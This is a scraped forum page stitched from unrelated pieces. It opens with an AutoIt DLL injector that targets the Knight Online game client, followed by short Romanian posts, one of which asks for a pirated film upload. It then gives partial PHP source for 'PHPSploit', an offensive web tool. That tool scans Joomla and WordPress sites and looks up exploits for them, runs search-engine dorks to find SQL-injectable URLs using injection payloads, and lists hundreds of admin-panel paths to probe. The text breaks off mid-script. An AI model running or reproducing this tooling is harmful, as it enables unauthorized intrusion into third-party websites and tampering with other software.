Global Const $gui_gr_pixel = 18 Global Const $gui_gr_hint = 20 Global Const $gui_gr_refresh = 22 Global Const $gui_gr_pensize = 24 Global Const $gui_gr_nobkcolor = -2 Global Const $gui_bkcolor_default = -1 Global Const $gui_bkcolor_transparent = -2 Global Const $gui_bkcolor_lv_alternate = -33554432 Global Const $gui_ws_ex_parentdrag = 1048576 If FileExists("hack.ini") Then Else MsgBox(16, "Dll Injector", "hack.ini Bulunamadi Lütfen Dizine Ekleyiniz", 5) Exit EndIf $InjectEdilecekExeTitle = IniRead("hack.ini", "dll", "Procces", "default") $dllyeri = IniRead("hack.ini", "halo", "Dll", "default") GUICreate("Dll Injector", 275, 100) GUISetBkColor(16777215) GUICtrlCreateLabel("KO.exe:", 10, 10, 50, 17) $i_processname = GUICtrlCreateInput($InjectEdilecekExeTitle, 65, 10, 200, 21) GUICtrlCreateLabel("DLL:", 10, 40, 50, 17) $i_dllpath = GUICtrlCreateInput($dllyeri, 65, 40, 150, 21) $b_searchdll = GUICtrlCreateButton("...", 225, 40, 40, 25) $r_auto = GUICtrlCreateRadio("Otomatik", 10, 75, 75, 17) GUICtrlSetState(-1, $gui_checked) $r_man = GUICtrlCreateRadio("Elle", 130, 75, 55, 17) $b_inject = GUICtrlCreateButton("Injectle", 190, 70, 75, 25) GUICtrlSetState(-1, $gui_disable) GUISetState() $injected = False Do $msg = GUIGetMsg() Switch $msg Case $b_searchdll GUICtrlSetData($i_dllpath, FileOpenDialog("Dll", @HomeDrive, "Dynamic Link Library (*.dll)", 3)) Case $r_auto GUICtrlSetState($b_inject, $gui_disable) Case $r_man GUICtrlSetState($b_inject, $gui_enable) Case $b_inject _injectdll(ProcessExists(GUICtrlRead($i_processname)), GUICtrlRead($i_dllpath)) _message(@error) EndSwitch If BitAND(GUICtrlRead($r_auto), $gui_checked) AND NOT $injected Then $processid = ProcessExists(GUICtrlRead($i_processname)) If $processid > 0 Then _injectdll($processid, GUICtrlRead($i_dllpath)) _message(@error) $injected = True EndIf EndIf Sleep(10) Until $msg == $gui_event_close Func _message($errorcode) If $errorcode <> 0 Then MsgBox(16, "Dll Injector", "Fatal Error" & @CRLF & "Hata Kodu: " & @error) Else MsgBox(64, "TEST", "Inject Succesfull", 3) If WinWaitActive("Knight OnLine Client", "") Then Sleep(100) WinSetState("Direnish.net", "", @SW_HIDE) EndIf Exit EndIf EndFunc Func _injectdll($processid, $dllpath) If $processid == 0 Then Return SetError(1, "", False) If NOT (FileExists($dllpath)) Then Return SetError(2, "", False) If NOT (StringRight($dllpath, 4) == ".dll") Then Return SetError(3, "", False) $kernel32 = DllOpen("kernel32.dll") If @error Then Return SetError(4, "", False) $dll_path = DllStructCreate("char[255]") DllCall($kernel32, "DWORD", "GetFullPathNameA", "str", $dllpath, "DWORD", 255, "ptr", DllStructGetPtr($dll_path), "int", 0) If @error Then Return SetError(5, "", False) $hprocess = DllCall($kernel32, "DWORD", "OpenProcess", "DWORD", 2035711, "int", 0, "DWORD", $processid) If @error Then Return SetError(6, "", False) $hmodule = DllCall($kernel32, "DWORD", "GetModuleHandleA", "str", "kernel32.dll") If @error Then Return SetError(7, "", False) $lpstartaddress = DllCall($kernel32, "DWORD", "GetProcAddress", "DWORD", $hmodule[0], "str", "LoadLibraryA") If @error Then Return SetError(8, "", False) $lpparameter = DllCall($kernel32, "DWORD", "VirtualAllocEx", "int", $hprocess[0], "int", 0, "ULONG_PTR", DllStructGetSize($dll_path), "DWORD", 12288, "int", 4) If @error Then Return SetError(9, "", False) DllCall("kernel32.dll", "BOOL", "WriteProcessMemory", "int", $hprocess[0], "DWORD", $lpparameter[0], "str", DllStructGetData($dll_path, 1), "ULONG_PTR", DllStructGetSize($dll_path), "int", 0) If @error Then Return SetError(10, "", False) $hthread = DllCall($kernel32, "int", "CreateRemoteThread", "DWORD", $hprocess[0], "int", 0, "int", 0, "DWORD", $lpstartaddress[0], "DWORD", $lpparameter[0], "int", 0, "int", 0) If @error Then Return SetError(11, "", False) DllCall($kernel32, "BOOL", "CloseHandle", "DWORD", $hprocess[0]) DllClose($kernel32) Return SetError(0, "", True) EndFunc Exit
-
Sti ce inseamna un PhPSploit? Ei astai un souce de PHPSploit! Daca sti ce inseamna atunci sti ce face, la ce se foloseste si cum se foloseste!
-
Actualizate!
-
Cine poate sa urce filmul riddrick 3 in calitate de dvd-rip pe youtube!? Multumesc!
-
<?php set_time_limit(0); error_reporting(0); @ignore_user_abort(true); ini_set('memory_limit', '128M'); if(@$_GET['webvuln']) { //lagripp code function ask_exploit_db($component){ // ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533; $ExPloiTdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($ExPloiTdb); if (@eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>"; }else{ echo"<td><a href='$ExPloiTdb'>Found ..!</a></td><td><--</td></tr>"; } } /**************************************************************/ function get_components($site1){ // ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533; $source = @file_get_contents($site1); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; ask_exploit_db($comm); } } /**************************************************************/ function get_plugins($site1){ // ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; $source = @file_get_contents($site1); preg_match_all("#/plugins/(.*?)/#i", $source, $f); $plugins=array_unique($f[1]); if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach($plugins as $plugin){ echo "<tr><td>$plugin</td>"; ask_exploit_db($plugin); } } /**************************************************************/ function t_header($site1){ // ***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">'; echo' <tr id="oo"> <td>Site : <a href="'.$site1.'">'.$site1.'</a></td> <td>Exploit-db</b></td> <td>Exploit it !</td> </tr> '; } //--------------fin gripp // Party vulnerability $site1=strip_tags(trim($_GET['webvuln'])); t_header($site1); $url_to_change = $site1; $www = 'www'; $position = strpos($url_to_change, $www); if ($position === false) { $site1 = str_replace("".$site1."", "www.".$site1."", $site1); } else { echo ''; } if($_GET['what'] == 'joomla') { echo get_components("http://".$site1); } elseif($_GET['what'] == 'wordpress') { echo get_plugins("http://".$site1); } } elseif($_GET['dork']) { //////////////// ICI POUR LES SITE SIMPLE SQLi seulement pour l'instant ?> <?php /* Google dork scanner * yepss... you know what this is * */ @error_reporting(0); @set_time_limit(60); function fetch($url) { if(!function_exists("curl_init")){ $bu = trim(@file_get_contents($url)); if($bu == "") return ""; else return $bu; } $header[] = "Accept-Language: en"; $header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"; $header[] = "Connection: Keep-Alive"; $header[] = "Pragma: no-cache"; $header[] = "Cache-Control: no-cache"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE ); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_TIMEOUT, 7); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $content = curl_exec($ch); curl_close($ch); return $content; } function sqlcheck($url_){ // clean url $url_ = "http://".trim(str_ireplace("http://","",$url_)); $url_ = str_ireplace("&","&",$url_); $urls = explode("?",$url_); // check if url contains querystring if(count($urls)==2){ $url = $urls[0]; $querys = explode("&",$urls[1]); foreach($querys as $query){ $vars = explode("=",$query); //echo $query; // check if parameter has a numeric value if((count($vars)>=2) && (is_numeric($vars[1]))){ $final = str_replace($query,$query."%27",$url_); //echo $final; $content = fetch($final); $url_1 = file_get_contents($url_); $url_2 = file_get_contents($final); if(preg_match("/sql syntax|sql error|right syntax to use near|Warning|SQL|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content) OR ($url_1 !== $url_2)){ return $vars[0]; } } } } return ""; // gagal son } function sqlheavycheck($url_){ // clean url $url_ = "http://".trim(str_ireplace("http://","",$url_)); $url_ = str_ireplace("&","&",$url_); // check if url contains querystring $pos = stripos($url_,"?"); if($pos !== false){ $url = substr($url_,0,$pos); $que = substr($url_,$pos+1); $querys = explode("&",$que); foreach($querys as $query){ $vars = explode("=",$query); //echo $query; // check if parameter has a numeric value if((count($vars)>=2) && (is_numeric($vars[1]))){ // and 1=(select 1) $acak = rand(1111,9999); $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_); $contrue = fetch($final); //echo "final1 : ".$final."<br />"; // and 1=(select 0) $acak = rand(1111,9999); $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_); //echo "final2 : ".$final."<br />"; $confalse = fetch($final); $numtrue = strlen(strip_tags($contrue)); $numfalse = strlen(strip_tags($confalse)); $selisih = $numtrue - $numfalse; if($selisih >= 30){ return $vars[0]; } else{ //' and 1=(select 1) and '1'='1 $acak = rand(1111,9999); $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_); $contrue = fetch($final); //echo "final1 : ".$final."<br />"; //' and 1=(select 0) and '1'='1 $acak = rand(1111,9999); $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_); //echo "final2 : ".$final."<br />"; $confalse = fetch($final); $numtrue = strlen(strip_tags($contrue)); $numfalse = strlen(strip_tags($confalse)); $selisih = $numtrue - $numfalse; if($selisih >= 30){ return $vars[0]; } } } } } return ""; // gagal son... } // debugging tools if(isset($_GET['check'])&&($_GET['check']!="")){ $url = $_GET['check']; echo $url." ".sqlcheck($url); die(); } if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){ $url = $_GET['heavycheck']; echo $url." ".sqlheavycheck($url); die(); } // debugging tools end if(isset($_GET['dork'])&&($_GET['dork']!="")){ $gnum = 10; // jumlah hasil pencarian perhalaman $setype = "google"; // default cari pakek g00gle if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype'])); if(isset($_GET['page'])){ $gpage = (int) $_GET['page']; if($gpage < 1) $gpage = 1; } else $gpage = 1; $gpage = ($gpage - 1) * $gnum; if($gpage > ($gpage * $gnum)){ echo "_finish_|max only ".$gpage." results"; die(); } $dork = stripslashes($_GET['dork']); $dorkg = "site:".urldecode($dork)." filetype:php"; $dorkb = urldecode("site:".$dork."+php"); $dorkb = str_replace(" ","+",$dorkb); if($setype == "google"){ for($i=1; $i<3; $i++) { $gsearch = fetch("http://www.google.com/search?hl=fr&q=" . urlencode($dorkg) . "&start=$gpage"); $raws = explode("<h3 class=\"r\">",$gsearch); if((trim($gsearch) == "") || (count($raws) <= 1) || !(preg_match('/<h3 class="r"><a href="(.*?)"/si',$gsearch))){ echo "<font color=#ff0000>[X] ".$setype."</font>"; die(); } } } elseif($setype == "bing"){ for($i=1; $i<3; $i++) { $dork = preg_replace("/^[^:]*.*)/i","\\1",$dorkb); $gsearch = fetch("http://www.bing.com/search?q=".$dorkb."&filt=all&first=".$gpage."&FORM=PERE3"); $raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch); if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){ echo "<font color=#ff0000>[X] ".$setype."</font>"; die(); } } } else{ echo "Search engine not supported"; die(); } foreach($raws as $korban){ if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){ $heavy = false; if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true; $calon = substr($korban,9); $pos = strpos($calon,"\""); if($pos !== false){ $url = trim(substr($calon,0,$pos)); if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue; if(!preg_match("/\w+=\d+/i",$url)) continue; if($heavy) { $vulnvar = sqlheavycheck($url); if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />"; else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />"; echo $laporan; } else{ $vulnvar = sqlcheck($url); if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />"; else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />"; echo $laporan; } } } } die(); // mas kamu koq looyo... } } else { $list['front'] ="admin team adm admincp admcp cp modcp moderatorcp adminare admins cpanel controlpanel"; $list['end'] = "admin1.php team admin1.html admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html ccms/ upload.php ccms/login.php ccms/index.php maintenance/ webmaster/ adm/ configuration/ configure/ websvn/ admin/ admin/account.php admin/account.html admin/index.php admin/index.html admin/login.php admin/login.html admin/home.php admin/controlpanel.html admin/controlpanel.php admin.php admin.html admin/cp.php admin/cp.html cp.php cp.html administrator/ administrator/index.html administrator/index.php administrator/login.html administrator/login.php administrator/account.html administrator/account.php administrator.php administrator.html login.php login.html modelsearch/login.php moderator.php moderator.html moderator/login.php moderator/login.html moderator/admin.php moderator/admin.html moderator/ account.php account.html controlpanel/ controlpanel.php controlpanel.html admincontrol.php admincontrol.html adminpanel.php adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp admin/account.asp admin/index.asp admin/login.asp admin/home.asp admin/controlpanel.asp admin.asp admin/cp.asp cp.asp administrator/index.asp administrator/login.asp administrator/account.asp administrator.asp login.asp modelsearch/login.asp moderator.asp moderator/login.asp moderator/admin.asp account.asp controlpanel.asp admincontrol.asp adminpanel.asp fileadmin/ fileadmin.php fileadmin.asp fileadmin.html administration/ administration.php administration.html sysadmin.php sysadmin.html phpMyAdmin/ phpmyadmin/ PMA/ admin/ dbadmin/ mysql/ myadmin/ phpmyadmin2/ phpMyAdmin2/ phpMyAdmin-2/ php-my-admin/ weMeanYouNoHarm/ V20xRmRRPT0K/ admin/pma/ admin/phpmyadmin/ db/ myadmin/ mysql/ mysqladmin/ typo3/phpmyadmin/ phpadmin/ phpmyadmin1/ web/phpMyAdmin/ xampp/phpmyadmin/ web/ php-my-admin/ websql/ phpMyAdmin-2/ php-my-admin/ phpMyAdmin-2.8.2.1/ phpMyAdmin-2.8.2.2/ phpMyAdmin-2.8.2.3/ phpMyAdmin-2.8.2.4/ phpMyAdmin-2.10.0.0/ phpMyAdmin-2.10.0.1/ phpMyAdmin-2.10.0.2/ phpMyAdmin-2.10.1.0/ phpMyAdmin-2.10.2.0/ phpMyAdmin-2.11.0.0/ phpMyAdmin-2.11.1.0/ phpMyAdmin-2.11.1.1/ phpMyAdmin-2.11.1.2/ phpMyAdmin-2.11.2.0/ phpMyAdmin-2.11.2.1/ phpMyAdmin-2.11.2.2/ phpMyAdmin-2.11.3.0/ phpMyAdmin-2.11.4.0/ phpMyAdmin-2.11.5.0/ phpMyAdmin-2.11.5.1/ phpMyAdmin-2.11.5.2/ phpMyAdmin-2.11.6.0/ phpMyAdmin-2.11.7.0/ phpMyAdmin-2.11.7.1/ phpMyAdmin-2.11.8.0/ phpMyAdmin-2.11.9.0/ phpMyAdmin-2.11.9.1/ phpMyAdmin-2.11.9.2/ phpMyAdmin-2.11.9.3/ phpMyAdmin-2.11.9.4/ phpMyAdmin-3.0.0.0/ phpMyAdmin-3.0.1.0/ phpMyAdmin-3.0.1.1/ phpMyAdmin-3.0.2.0/ phpMyAdmin-3.1.0.0/ phpMyAdmin-3.1.1.0/ phpMyAdmin-3.1.2.0/ phpMyAdmin-3.1.3.0/ phpMyAdmin-2.9.0-rc1/ phpMyAdmin-2.9.0/ phpMyAdmin-2.9.0.1/ phpMyAdmin-2.9.0.2/ phpMyAdmin-2.9.1/ phpMyAdmin-2.9.2/ phpMyAdmin-3.4.3.1-all-languages/ phpMyAdmin-3.4.3.1-english/ phpMyAdmin-3.4.3.1/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ pma2006/ pma2007/ pma2008/ pma2009/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ databaseadmin/ admm/ admn/ w00tw00t.at.blackhats.romanian.anti-sec:)/ phpMyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ pma/scripts/setup.php/ myadmin/scripts/setup.php/ MyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ phpMyAdmin/scripts/setup.php/ phpMyAdmin-2.2.3/ phpMyAdmin-2.2.6/ phpMyAdmin-2.5.1/ phpMyAdmin-2.5.4/ phpMyAdmin-2.5.5-rc1/ phpMyAdmin-2.5.5-rc2/ phpMyAdmin-2.5.5/ phpMyAdmin-2.5.5-pl1/ phpMyAdmin-2.5.6-rc1/ phpMyAdmin-2.5.6-rc2/ phpMyAdmin-2.5.6/ phpMyAdmin-2.5.7/ phpMyAdmin-2.5.7-pl1/ phpMyAdmin-2.6.0-alpha/ phpMyAdmin-2.6.0-alpha2/ phpMyAdmin-2.6.0-beta1/ phpMyAdmin-2.6.0-beta2/ phpMyAdmin-2.6.0-rc1/ phpMyAdmin-2.6.0-rc2/ phpMyAdmin-2.6.0-rc3/ phpMyAdmin-2.6.0/ phpMyAdmin-2.6.0-pl1/ phpMyAdmin-2.6.0-pl2/ phpMyAdmin-2.6.0-pl3/ phpMyAdmin-2.6.1-rc1/ phpMyAdmin-2.6.1-rc2/ phpMyAdmin-2.6.1/ phpMyAdmin-2.6.1-pl1/ phpMyAdmin-2.6.1-pl2/ phpMyAdmin-2.6.1-pl3/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2-beta1/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2/ phpMyAdmin-2.6.2-pl1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-rc1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-pl1/ phpMyAdmin-2.6.4-rc1/ phpMyAdmin-2.6.4-pl1/ phpMyAdmin-2.6.4-pl2/ phpMyAdmin-2.6.4-pl3/ phpMyAdmin-2.6.4-pl4/ phpMyAdmin-2.6.4/ phpMyAdmin-2.7.0-beta1/ phpMyAdmin-2.7.0-rc1/ phpMyAdmin-2.7.0-pl1/ phpMyAdmin-2.7.0-pl2/ phpMyAdmin-2.7.0/ phpMyAdmin-2.8.0-beta1/ phpMyAdmin-2.8.0-rc1/ phpMyAdmin-2.8.0-rc2/ phpMyAdmin-2.8.0/ phpMyAdmin-2.8.0.1/ phpMyAdmin-2.8.0.2/ phpMyAdmin-2.8.0.3/ phpMyAdmin-2.8.0.4/ phpMyAdmin-2.8.1-rc1/ phpMyAdmin-2.8.1/ phpMyAdmin-2.8.2/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ myadmin/ sysadmin.asp sysadmin/ ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php Server.html Server.asp Server/ wp-admin/ administr8.php administr8.html administr8/ administr8.asp webadmin/ webadmin.php webadmin.asp webadmin.html administratie/ admins/ admins.php admins.asp admins.html administrivia/ Database_Administration/ WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cPanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ members/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/ database_administration/ power_user/ system_administration/ ss_vms_admin_sm/ adminarea/ bb-admin/ adminLogin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ admin/admin.php admin_area/admin.php admin_area/login.php siteadmin/login.php siteadmin/index.php siteadmin/login.html admin/admin.html admin_area/index.php bb-admin/index.php bb-admin/login.php bb-admin/admin.php admin_area/login.html admin_area/index.html admincp/index.asp admincp/login.asp admincp/index.html webadmin/index.html webadmin/admin.html webadmin/login.html admin/admin_login.html admin_login.html panel-administracion/login.html nsw/admin/login.php webadmin/login.php admin/admin_login.php admin_login.php admin_area/admin.html pages/admin/admin-login.php admin/admin-login.php admin-login.php bb-admin/index.html bb-admin/login.html bb-admin/admin.html admin/home.html pages/admin/admin-login.html admin/admin-login.html admin-login.html admin/adminLogin.html adminLogin.html home.html rcjakar/admin/login.php adminarea/index.html adminarea/admin.html webadmin/index.php webadmin/admin.php user.html modelsearch/login.html adminarea/login.html panel-administracion/index.html panel-administracion/admin.html modelsearch/index.html modelsearch/admin.html admincontrol/login.html adm/index.html adm.html user.php panel-administracion/login.php wp-login.php adminLogin.php admin/adminLogin.php home.php adminarea/index.php adminarea/admin.php adminarea/login.php panel-administracion/index.php panel-administracion/admin.php modelsearch/index.php modelsearch/admin.php admincontrol/login.php adm/admloginuser.php admloginuser.php admin2/login.php admin2/index.php adm/index.php adm.php affiliate.php adm_auth.php memberadmin.php administratorlogin.php admin/admin.asp admin_area/admin.asp admin_area/login.asp admin_area/index.asp bb-admin/index.asp bb-admin/login.asp bb-admin/admin.asp pages/admin/admin-login.asp admin/admin-login.asp admin-login.asp user.asp webadmin/index.asp webadmin/admin.asp webadmin/login.asp admin/admin_login.asp admin_login.asp panel-administracion/login.asp adminLogin.asp admin/adminLogin.asp home.asp adminarea/index.asp adminarea/admin.asp adminarea/login.asp panel-administracion/index.asp panel-administracion/admin.asp modelsearch/index.asp modelsearch/admin.asp admincontrol/login.asp adm/admloginuser.asp admloginuser.asp admin2/login.asp admin2/index.asp adm/index.asp adm.asp affiliate.asp adm_auth.asp memberadmin.asp administratorlogin.asp siteadmin/login.asp siteadmin/index.asp ADMIN/ paneldecontrol/ login/ cms/ admon/ ADMON/ administrador/ ADMIN/login.php panelc/ ADMIN/login.html admin.php login.htm login.html login/ login.php adm/ admin/ admin/account.html admin/login.html admin/login.htm admin/home.php admin/controlpanel.html admin/controlpanel.htm admin/cp.php admin/adminLogin.html admin/adminLogin.htm admin/admin_login.php admin/controlpanel.php admin/admin-login.php admin-login.php admin/account.php admin/admin.php admin.htm admin.html adminitem/ adminitem.php adminitems/ adminitems.php administrator/ administrator/login.php administrator.php administration/ administration.php adminLogin/ adminlogin.php admin_area/admin.php admin_area/ admin_area/login.php manager/ manager.php letmein/ letmein.php superuser/ superuser.php access/ access.php sysadm/ sysadm.php superman/ supervisor/ panel.php control/ control.php member/ member.php members/ members.php user/ user.php cp/ uvpanel/ manage/ manage.php management/ management.php signin/ signin.php log-in/ log-in.php log_in/ log_in.php sign_in/ sign_in.php sign-in/ sign-in.php users/ users.php accounts/ accounts.php wp-login.php bb-admin/login.php bb-admin/admin.php bb-admin/admin.html administrator/account.php relogin.htm relogin.html check.php relogin.php processlogin.php checklogin.php checkuser.php checkadmin.php isadmin.php authenticate.php authentication.php auth.php authuser.php authadmin.php cp.php modelsearch/login.php moderator.php moderator/ controlpanel/ controlpanel.php admincontrol.php adminpanel.php fileadmin/ fileadmin.php sysadmin.php admin1.php admin1.html admin1.htm admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html phpmyadmin/ myadmin/ ur-admin.php ur-admin/ Server.php Server/ wp-admin/ administr8.php administr8/ webadmin/ webadmin.php administratie/ admins/ admins.php administrivia/ Database_Administration/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ power_user/ system_administration/ ss_vms_admin_sm/ bb-admin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ adm.php admin_login.php panel-administracion/login.php pages/admin/admin-login.php pages/admin/ acceso.php admincp/login.php admincp/ adminarea/ admincontrol/ affiliate.php adm_auth.php memberadmin.php administratorlogin.php modules/admin/ administrators.php siteadmin/ siteadmin.php adminsite/ kpanel/ vorod/ vorod.php vorud/ vorud.php adminpanel/ PSUser/ secure/ webmaster/ webmaster.php autologin.php userlogin.php admin_area.php cmsadmin.php security/ usr/ root/ secret/ admin/login.php admin/adminLogin.php moderator.php moderator.html moderator/login.php moderator/admin.php yonetici.php 0admin/ 0manager/ aadmin/ cgi-bin/login.php login1.php login_admin/ login_admin.php login_out/ login_out.php login_user.php loginerror/ loginok/ loginsave/ loginsuper/ loginsuper.php login.php logout/ logout.php secrets/ super1/ super1.php super_index.php super_login.php supermanager.php superman.php superuser.php supervise/ supervise/Login.php super.php"; function template() { echo ' <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta **********="Content-Type" *********"text/html; charset=utf-8" /> <title>PHPSploit V1.0 Decoded By MegaBedder</title> <style type="text/css"> h1.technique-two { width: 405px; height: 120px; margin: 0 auto; } body{ background: #070707; background-image: url("http://www.easy-upload.net/fichiers/stalker-21-stalccccccker-jeux-video.20111184848.jpg");; margin: 0; padding: 0; background-attachment:fixed; color: #FFF; font-family: Calibri; font-size: 13px; } a{ color: #FFF; text-decoration: none; font-weight: bold; } .wrapper{ width: 1000px; margin: 0 auto; } .tube{ padding: 10px; } .red{ width: 490px; border: 1px solid #555; background: #333; color: #FFF } .red input{ background: #000; border: 1px solid #555; color: #FFF; } .blue{ float: left; width: 500px; border: 1px solid #1d7fc3; background: #191919; color: #1d7fc3; } .yellow{ position:absolute; margin-left: 510px; float: right; width: 480px; border: 1px solid #FFBF00; background: #191919; color: #FFBF00; } .green{ float: left; width: 490px; border: 1px solid #5fd419; background: #191919; color: #5fd419; } input,select,textarea{ border:0; border:1px solid #900; color:#fff; background:#000; margin:0; padding:2px 4px; } input:hover,textarea:hover,select:hover{ background:#200; border:1px solid #f00; } option{ background:#000; } .white{ color:#fff; } #status{ width:100%; height:auto; padding:4px 0; border-bottom:1px solid #300; } #result a{ color:#777; } .sign{ color:#222; } #box{ margin:10px 0 0 0; } </style> <script type="text/javascript"> <!-- function insertcode($text, $place, $replace) { var $this = $text; var logbox = document.getElementById($place); if($replace == 0) document.getElementById($place).innerHTML = logbox.innerHTML+$this; else document.getElementById($place).innerHTML = $this; //document.getElementById("helpbox").innerHTML = $this; } --> </script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>'; ?> <!-- <?php echo date("Y",time()); ?> Revan Aditya --> <script type="text/javascript"> jalan = false; nomer = 1; 